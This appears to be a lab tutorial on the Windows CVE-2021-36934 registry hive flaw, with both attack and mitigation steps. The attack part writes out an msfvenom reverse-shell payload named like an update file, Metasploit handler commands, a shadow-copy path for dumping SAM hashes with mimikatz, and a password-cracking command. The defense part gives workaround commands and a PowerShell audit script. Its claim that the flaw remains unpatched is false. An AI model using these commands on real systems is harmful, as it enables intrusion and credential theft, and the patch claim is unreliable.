Windows Privilege Escalation - Offense and Defense!

Windows Privilege Escalation

Prerequisites: a Windows VM, a Linux attack box, and Empire/Metasploit for shell access (not demonstrated).



Vulnerability Details

CVE-2021-36934

Windows 10 and Windows 11 are vulnerable to a local elevation-of-privilege vulnerability: users with low privileges can read sensitive Registry database files.

The database files (hives) backing the Windows Registry are stored under the C:\Windows\system32\config folder and are split into separate files such as SYSTEM, SECURITY, SAM, DEFAULT, and SOFTWARE.

These files contain sensitive information about every user account on the device and the security tokens used by Windows features.

This is especially true of the Security Account Manager (SAM) file, as it contains the hashed passwords of all users on the system, which threat actors can use to assume those users' identities.



Environment Setup

Setting up a Windows 10 VM in VirtualBox:

Download the VirtualBox client and install it:

https://www.virtualbox.org

Download a fresh Windows 10 image from Microsoft's official website:

https://www.microsoft.com/en-us/software-download/windows10

Install VirtualBox, then install Windows 10 inside it.




Setting up Kali Linux (attack box in a virtual machine)

Download the pre-made Kali Linux machine from Offensive Security's website / Kali's official website:

https://www.kali.org

https://www.offensive-security.com

Install it in VirtualBox as well.




Creating users in Windows

Open your newly installed Windows VM. You'll be logged in as an administrator by default. Create a low-privileged user.


Reference Screenshot:



After creating the user, log out and log back in as the low-privileged user.




Gaining Access from Attack Box

Open up the Kali VM (the default username and password is kali:kali) and launch Metasploit. (Make sure to update the packages first to avoid errors: sudo apt update && sudo apt upgrade)

Create a Windows executable carrying a meterpreter payload:


msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows -f exe LHOST=<local-ip> LPORT=4444 -o /home/kali/update.listeners


Transfer this payload to the Windows VM and execute it.

Then open msfconsole and start a listener:


Reference Screenshot:



Commands used:

• msfconsole
• use exploit/multi/handler
• set payload windows/meterpreter/reverse_tcp
• set LHOST eth0
• set LPORT 4444
• exploit

You'll get a reverse shell (cmd). For demonstration purposes we used the Windows cmd shell.



Demonstration

On Windows 10 and Windows 11, the Registry files associated with the Security Account Manager (SAM), and all other Registry databases, are readable by the low-privileged 'Users' group on the device.

With these loose file permissions, a threat actor with limited privileges on a device can extract the NTLM password hashes for all accounts on the device and use those hashes in pass-the-hash attacks to gain elevated privileges.

As the screenshot shows, the SAM file itself cannot be opened directly, because the OS keeps it locked while Windows is running. BUT the Registry files, including SAM, are also backed up by the Windows Volume Shadow Copy service, and those copies are not locked. We can take advantage of that.

As a threat actor, we can use the Win32 device namespace path of a shadow volume copy to access the file:

\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM

(Enter this path in mimikatz to get all the NTLM hashes.)



Getting NTLM Hashes

Use mimikatz to extract the NTLM hashes of all users on the machine, including local_admin. Then run the hashes against a wordlist such as rockyou.txt to recover the passwords.

Example command: john <hash_file> --wordlist=/usr/share/wordlists/rockyou.txt


How to Prevent The Exploit

Currently there's no patch for this vulnerability. But you can delete the shadow copies and restrict access to c:\windows\system32\config.

Note: delete the backed-up shadow copies before restricting access to system32\config. A shadow copy taken before the ACL change still contains a readable copy of the hives, so changing the permissions alone does not close the hole.

Commands:

Deleting shadow copies: vssadmin delete shadows /all

Restrict access: icacls %windir%\system32\config\*.* /inheritance:e
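To confirm that the two workaround commands above actually took effect, the following PowerShell audit is added here as an example (it is not from the original post). It reports, for each hive file under %windir%\System32\config, whether BUILTIN\Users still holds an Allow entry with read access, and lists any VSS shadow copies that remain on the host. It assumes an elevated PowerShell session on the Windows 10 VM built earlier; the function names Test-HiveExposure and Get-RemainingShadowCopy are our own.

```powershell
<#
  Added example (not from the original post): audit the CVE-2021-36934 workaround.
  1. Does BUILTIN\Users still have read access on the registry hive files?
  2. Are there shadow copies left that still carry an old, readable copy of SAM?
  Assumes an elevated PowerShell session on the Windows 10 VM from this guide.
#>

function Test-HiveExposure {
    [CmdletBinding()]
    param(
        # Hive files named in the post
        [string[]]$Hives = @('SAM', 'SECURITY', 'SYSTEM', 'SOFTWARE', 'DEFAULT'),
        [string]$ConfigDir = (Join-Path $env:windir 'System32\config')
    )

    # Well-known SID of BUILTIN\Users; comparing by SID also works on localized Windows builds
    $usersSid = 'S-1-5-32-545'
    $readMask = [int][System.Security.AccessControl.FileSystemRights]::ReadData

    foreach ($hive in $Hives) {
        $path = Join-Path $ConfigDir $hive
        if (-not (Test-Path -LiteralPath $path)) { continue }

        # Get-Acl reads the security descriptor even though the hive content is locked by the OS
        $acl = Get-Acl -LiteralPath $path

        $usersRead = @($acl.Access | Where-Object {
            $sid = try {
                $_.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
            } catch { $null }

            $_.AccessControlType -eq 'Allow' -and
            (([int]$_.FileSystemRights -band $readMask) -ne 0) -and
            $sid -eq $usersSid
        })

        [pscustomobject]@{
            Hive         = $hive
            Path         = $path
            UsersCanRead = ($usersRead.Count -gt 0)
            # Inherited entries mean the icacls /inheritance:e step has not been applied
            Inherited    = (@($usersRead | Where-Object IsInherited).Count -gt 0)
        }
    }
}

function Get-RemainingShadowCopy {
    # Each Win32_ShadowCopy instance is a VSS snapshot that may still hold a readable SAM
    Get-CimInstance -ClassName Win32_ShadowCopy |
        Select-Object ID, VolumeName, InstallDate, DeviceObject
}

# Usage: run after applying the vssadmin and icacls commands from the post
$hiveReport = @(Test-HiveExposure)
$hiveReport | Format-Table -AutoSize

$shadows = @(Get-RemainingShadowCopy)
$exposedHives = @($hiveReport | Where-Object UsersCanRead)

if ($exposedHives.Count -gt 0 -and $shadows.Count -gt 0) {
    Write-Warning "Users can read $($exposedHives.Count) hive(s) and $($shadows.Count) shadow copy(ies) remain: host is still exposed"
} elseif ($exposedHives.Count -gt 0) {
    Write-Warning 'Users still have read access on the hives; apply the icacls command above'
} elseif ($shadows.Count -gt 0) {
    Write-Warning "$($shadows.Count) shadow copy(ies) remain; they may still contain readable hives"
} else {
    Write-Output 'No hive readable by BUILTIN\Users and no shadow copies present'
}
```

The ACL check deliberately matches on the SID rather than the group name, and it flags inherited entries separately: the icacls workaround works by cutting inheritance from the parent folder, so a hive whose Users entry is still marked as inherited has not been fixed. The shadow copy list is reported even when the ACLs are clean, because snapshots taken before the permission change keep the old, readable hives.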

Final Thoughts

So far, this vulnerability hasn't been patched by Microsoft. Security researchers suggest that every corporate or local business should follow the steps above: disable access to the c:\windows\system32\config folder for everyone except local administrators and domain admins, and delete the shadow backup copies, to prevent this kind of situation.
